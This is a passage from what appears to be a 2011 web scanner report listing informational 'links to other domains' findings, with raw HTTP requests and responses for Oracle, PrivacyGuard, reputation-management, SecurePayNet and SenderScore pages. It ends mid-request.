Accept-Ranges: bytes
ETag: "adac3c6dfd7cb1:11bf65"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:35:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<br>
   asTo update your Flash plugin from Adobe, <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" class="arial12bab4000">click here</a>
...[SNIP]...

23.546. http://www.oracle.com/us/go/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/go/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/go/index.html?&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (TM;max-age=300+0;age=0;ecid=221079983340524304,0)
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:36 GMT
Connection: close
Content-Length: 3375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><scr
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

23.547. http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /webapps/dialogue/ns/dlgwelcome.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:39 GMT
Connection: close
Set-Cookie: JSESSIONID=2e63fae3eb91f5fc5259bf707b004df90622e3ad401be1a214b18c793ce79d23.e3yTa3qTahyRe3uRb3aSchyTby0; path=/webapps/dialogue
Content-Length: 11659

<!-- ver 1.1 -->


<SCRIPT src="form.js" language="Javascript"></SCRIPT>

<!-- VKUMAR
<SCRIPT language='JavaScript' src='http://www.oracle.com/admin/jscripts/lib.js'></SCRIPT>
<sc
...[SNIP]...
<a href="http://www.oracle.com/" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/webcontent/331816.gif" alt="Oracle Corporation" width="123" height="30" hspace="33" border="0"></a>
...[SNIP]...
<td><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/webcontent/331814.gif" width="10" height="5" border="0"><br><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/336535.jpg" width="750" height="275" border="0" alt="We can improve our security and compliance, while reducing IT costs with Oracle Identity Management." /></td>
...[SNIP]...
<p align="center" class="bodycopy"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/336529.jpg" alt="Oracle Fusion Middleware" width="158" height="61" border="0" /><br />
...[SNIP]...
</script>    <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/oratrack.js"></script>
...[SNIP]...
</script>        <script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">        </script>        <noscript>        <img height=1 width=1 border=0 src="http://www.googleadservices.com/pagead/conversion/1067274266/extclk?script=0">        </noscript>
...[SNIP]...

23.548. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1023174153/?label=posFCJPGhgIQiczx5wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<p class="MsoNormal" style="line-height: normal;"><img alt="" src="http://174.121.243.229/~wwwposi1/images/stories/security.gif" /></p>
...[SNIP]...

23.549. http://www.privacyguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privacyguard.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ref=P158PGDTCSD0007 HTTP/1.1
Host: www.privacyguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23983
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=gpn00q55oi4y4bjtmzqcr255; path=/; HttpOnly
Set-Cookie: hasCookies=true; path=/
Date: Mon, 25 Apr 2011 00:50:21 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/25/2011 12:50:21 AM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PGDTCSD0007 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Co
...[SNIP]...
<td valign="top"><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.PRIVACYGUARD.COM&lang=en" target="_new"><img alt="verisign" src="/BCA/PG_NEW/images/home/logos-verisign.gif" border="0" style="margin-right:50px;" />
...[SNIP]...
<td valign="top"><a href="https://smp-01.verizonbusiness.com/certinfo/certified.do?CERTID=070506J800" target="_new"><img alt="cybertrust" src="/BCA/PG_NEW/images/home/logos-cybertrust.gif" border="0" />
...[SNIP]...
<div><a class="twitterlink" href="http://twitter.com/PrivacyGuard" target="_blank"></a>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&amp;count=2"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/990326229/?label=OAAhCPPElgIQ1duc2AM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/home.bca -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

23.550. https://www.privacyguard.com/secure/promo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/promo.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /secure/promo.aspx?lyr=promoLyr1 HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
Referer: http://www.privacyguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.1.10.1303674285; hasCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 21166
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:21:04 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 8:21:04 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...
<!--beginP: Core.Body-->

<IMG SRC="https://altfarm.mediaplex.com/ad/bk/11125-66175-3840-0?Joins=1&mpuid=" BORDER=0 HEIGHT=1 WIDTH=1 alt="" >


<!--beginP: Tag-->
...[SNIP]...
<td><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.PRIVACYGUARD.COM&lang=en" target="_new"><img alt="verisign" src="/BCA/PG_NEW/images/dtcEnroll/logo-verisign.gif" border="0" style="margin-right:20px;" />
...[SNIP]...
<td><a href="https://smp-01.verizonbusiness.com/certinfo/certified.do?CERTID=070506J800" target="_new"><img alt="cybertrust" src="/BCA/PG_NEW/images/dtcEnroll/logo-VerizonCybertrust.gif" border="0" />
...[SNIP]...

23.551. http://www.reputationengineer.com/internet-reputation-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /internet-reputation-management/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /internet-reputation-management/?gclid=CN-bzOa1tqgCFYbb4AodHHmKBw HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:37:04 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.reputationengineer.com/xmlrpc.php
Set-Cookie: PHPSESSID=1433347768753da3e21154d1e825a93a; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 29051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<li class="sociablefirst"><a rel="nofollow" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F&amp;title=Reputation%20Management&amp;bodytext=Reputation%20For%20Individuals%20%7C%20Reputation%20For%20Businesses%20%7C%20Reputation%20For%20Politicians%0D%0AReputation%0D%0A%0D%0AThe%20reputation%20of%20a%20company%20is%20one%20of%20its%20most%20important%20assets.%20In%20a%20fast-moving%20and%20highly%20competitive%20environment%20and%20a%20media-influenced%20public%2C%20cre" title="Digg"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="Digg" alt="Digg" style="width: 16px; height: 16px; background: transparent url(http://www.repu
...[SNIP]...
<li><a rel="nofollow" href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F" title="Sphinn"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="Sphinn" alt="Sphinn" style="width: 16px; height: 16px; background: transparent url(http://www.
...[SNIP]...
<li><a rel="nofollow" href="http://delicious.com/post?url=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F&amp;title=Reputation%20Management&amp;notes=Reputation%20For%20Individuals%20%7C%20Reputation%20For%20Businesses%20%7C%20Reputation%20For%20Politicians%0D%0AReputation%0D%0A%0D%0AThe%20reputation%20of%20a%20company%20is%20one%20of%20its%20most%20important%20assets.%20In%20a%20fast-moving%20and%20highly%20competitive%20environment%20and%20a%20media-influenced%20public%2C%20cre" title="del.icio.us"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="del.icio.us" alt="del.icio.us" style="width: 16px; height: 16px; background: transparent url(h
...[SNIP]...
<li><a rel="nofollow" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F&amp;t=Reputation%20Management" title="Facebook"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="Facebook" alt="Facebook" style="width: 16px; height: 16px; background: transparent url(http://
...[SNIP]...
<li><a rel="nofollow" href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F&amp;title=Reputation%20Management" title="Mixx"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="Mixx" alt="Mixx" style="width: 16px; height: 16px; background: transparent url(http://www.repu
...[SNIP]...
<li class="sociablelast"><a rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fwww.reputationengineer.com%2Finternet-reputation-management%2F&amp;title=Reputation%20Management&amp;annotation=Reputation%20For%20Individuals%20%7C%20Reputation%20For%20Businesses%20%7C%20Reputation%20For%20Politicians%0D%0AReputation%0D%0A%0D%0AThe%20reputation%20of%20a%20company%20is%20one%20of%20its%20most%20important%20assets.%20In%20a%20fast-moving%20and%20highly%20competitive%20environment%20and%20a%20media-influenced%20public%2C%20cre" title="Google Bookmarks"><img src="http://www.reputationengineer.com/wp-content/plugins/sociable/images/services-sprite.gif" title="Google Bookmarks" alt="Google Bookmarks" style="width: 16px; height: 16px; background: transpa
...[SNIP]...
<p>WP-Cumulus by <a href="http://www.roytanck.com/">Roy Tanck</a> and <a href="http://lukemorton.co.uk/">Luke Morton</a> requires <a href="http://www.macromedia.com/go/getflashplayer">Flash Player</a>
...[SNIP]...
<!-- Begin PayPal Logo --><A HREF="https://www.paypal.com/ph/mrb/pal=A9W6FTJ2VQMRS" target="_blank"><IMG SRC="http://images.paypal.com/en_US/i/bnr/paypal_mrb_banner.gif" BORDER="0" ALT="Sign up for PayPal and start accepting credit card payments instantly."></A>
...[SNIP]...

23.552. http://www.reputationmanagementconsultants.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<link rel="stylesheet" href="/style.css" type="text/css">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<div class="ads"> <a href="http://www.la.bbb.org/BusinessReport.aspx?CompanyID=100095279&source=ctc" rel="nofollow" target="_blank"><img src="/images/bbb.png" alt="BBB Accredited Business">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1040833525/?label=Mdc0CIOO1wEQ9ben8AM&amp;guid=ON&amp;script=0"/> </div>
...[SNIP]...
</script>
<iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=2451' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>

<script type="text/javascript" src="//www.veruta.com/scripts/trackmerchant.js"></script>
...[SNIP]...
<!-- 12.05.2010 -->
<iframe name="RMLanding" src="http://insight.adsrvr.org/track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl" wdith="0" height="0" frameborder="0"></iframe>
...[SNIP]...

23.553. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/fos/css/0/sales_http_20101025ak.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/pl_20110112_http.css" />

<link rel="canonical" href="http://www.securepaynet.net/Default.aspx?prog_id=indextonet"/>
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
<a id="pch_flaglink" name="pch_flaglink" title="Click on the flag to change your currency" href="javascript:atlIsiShow();"><img id="pch_fl_flag" src="http://img5.wsimg.com/fos/icn/country_flags/us.gif" border="0"></a>
...[SNIP]...
<div class="pch_ct_countalt"><img id="pch_ct_count_tip" src="http://img5.wsimg.com/fos/spc/spc_tran.gif" height="19" width="65"></div>
...[SNIP]...
</div>


<script src="http://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="reseller_curve_bl">

<script src="http://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.securepaynet.net/gdshop/hosting/landing.asp?ci=13518&prog_id=indextonet&isc=kro_2011">
    <img alt="" src="http://img1.wsimg.com/fos/hp/0/img_slider_hosting.png" style="border:0px;
    outline: none;"/>
</a>
...[SNIP]...
<a href="http://www.securepaynet.net/gdshop/email.asp?ci=13520&prog_id=indextonet&isc=kro_2011">
<img alt="" src="http://img1.wsimg.com/fos/hp/0/img_slider_email.png" style="border: 0px;
outline: none;" />
</a>
...[SNIP]...
<a href="http://www.securepaynet.net/gdshop/traffic_blazer/landing.asp?ci=13505&prog_id=indextonet&isc=kro_2011">
<img alt="" src="http://img1.wsimg.com/fos/hp/0/img_slider_webtraffic.png" style="border:0px;outline:none;" /></a>
...[SNIP]...
<a href="http://www.securepaynet.net/gdshop/ssl/ssl.asp?ci=13527&prog_id=indextonet&isc=kro_2011">
<img alt="" src="http://img1.wsimg.com/fos/hp/0/img_slider_ssl.png" style="border: 0px;outline: none;" /></a>
...[SNIP]...
<div style="text-align:center;">
<img alt="" src="http://img1.wsimg.com/fos/hp/0/img_slider_qsc.png" style="border: 0px;outline: none;" />
</div>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=75ga67a9e1266b359cd4366b52cd37b2396947b5c91h26;c=s;v=2"></script>
...[SNIP]...
<noscript><img src="https://rt.trafficfacts.com/ns.php?k=75ga67a9e1266b359cd4366b52cd37b2396947b5c91h26" height="1" width="1" alt=""></noscript>
...[SNIP]...
</div>
   
   
<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="http://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...

23.554. https://www.senderscore.org/landing/ppcregistration/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:54 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:30:54 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ff42t7omks9m225jgdh0f4huh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<!-- SiteCatalyst code version: H.15.1
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" src="https://www.fathomseo.com/ssl/tracking/fssenderscore.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.15.1
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" src="https://www.fathomseo.com/ssl/tracking/fsreturnpath.js"></script>
...[SNIP]...

23.555. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=475 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
